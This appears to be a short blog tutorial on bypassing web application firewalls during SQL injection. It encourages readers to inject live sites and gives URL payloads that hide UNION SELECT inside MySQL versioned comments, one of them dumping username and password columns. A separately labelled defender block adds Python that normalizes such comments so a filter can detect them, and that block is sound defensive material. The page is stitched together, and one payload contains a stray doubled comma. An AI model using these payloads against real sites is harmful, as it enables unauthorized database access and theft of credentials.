SQL Injection With WAF Bypassing

After reading my tutorial about basic SQL injection, I think you have tried to inject some sites and may be getting an error like the one below.

This is due to a Web Application Firewall, also called a WAF. It blocks our SQL query, so we can't inject as we did earlier; we have to add something to bypass this WAF. It is simple to bypass a WAF by using the commenting method. You can use `/*!50000*/`-style inline comments (MySQL versioned comments). Here I will show you how I bypass a WAF using inline comments.

www.website.com/index.php?id=1 order by 3--   No error

www.website.com/index.php?id=1 order by 4--   error

www.website.com/index.php?id=-1 union select 1,2,3--   Forbidden

www.website.com/index.php?id=-1 /*!50000union*/ /*!50000select*/ 1,2,3--

VOILA! Bypassed the WAF :-)

Now we can use comments to bypass the WAF filter for our whole query. Just wrap each keyword as /*!queryhere*/ to bypass the filter.

ex: www.website.com/index.php?id=-2' /*!50000union*/ /*!50000selEct*/ 1,2,/*!50000gRoUp_coNcat(username,0x0a,password,0x0a,AccountStatus,,0x0a,PriorityLevel,0x0a)*/,4,5,6  /*!50000from*/ information_schema.columns /*!50000WHERE*/ table_name=0x79656c6c6f775f6167656e7473--+
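As an added defender-side example (not code from the original post), the following Python shows why a keyword rule applied to the raw parameter misses the inline-comment trick above, and how normalizing MySQL versioned comments (`/*!NNNNN ... */`, which the server executes as SQL) before matching catches it. The sample strings are constructed from the post's own queries; the function names are assumptions.

```python
import re

# Constructed samples, taken from the queries shown in the post.
SAMPLE_PLAIN = "-1 union select 1,2,3--"
SAMPLE_BYPASS = "-1 /*!50000union*/ /*!50000selEct*/ 1,2,3--"
SAMPLE_BENIGN = "42"

# A simplistic WAF signature: UNION ... SELECT as whole words.
KEYWORD_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)
# MySQL versioned comment: /*!50000 text */ -> "text" is executed by the server.
VERSIONED_COMMENT_RE = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.DOTALL)
# Ordinary /* ... */ comments are ignored by the server entirely.
PLAIN_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)


def naive_is_blocked(value: str) -> bool:
    """Match the signature against the raw parameter, as a weak rule does."""
    return bool(KEYWORD_RE.search(value))


def normalize(value: str) -> str:
    """Rewrite the parameter the way the MySQL parser will read it.

    Versioned comments keep their inner text (the WAF must assume the
    server version is high enough to run it); plain comments become a
    space; whitespace is collapsed and the result is lower-cased so
    mixed-case keywords such as 'selEct' no longer matter.
    """
    value = VERSIONED_COMMENT_RE.sub(lambda m: " " + m.group(1) + " ", value)
    value = PLAIN_COMMENT_RE.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def is_blocked(value: str) -> bool:
    """Match the signature against the normalized parameter."""
    return bool(KEYWORD_RE.search(normalize(value)))


if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_BYPASS, SAMPLE_BENIGN):
        print(f"{sample!r}: naive={naive_is_blocked(sample)} "
              f"normalized={is_blocked(sample)}")
```

Normalization only closes this one evasion; the durable fix on the application side is parameterized queries, so that the value never reaches the SQL parser as code.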

          Practice WAF Bypassing here:


Reviewed by Unknown on 1/20/2015
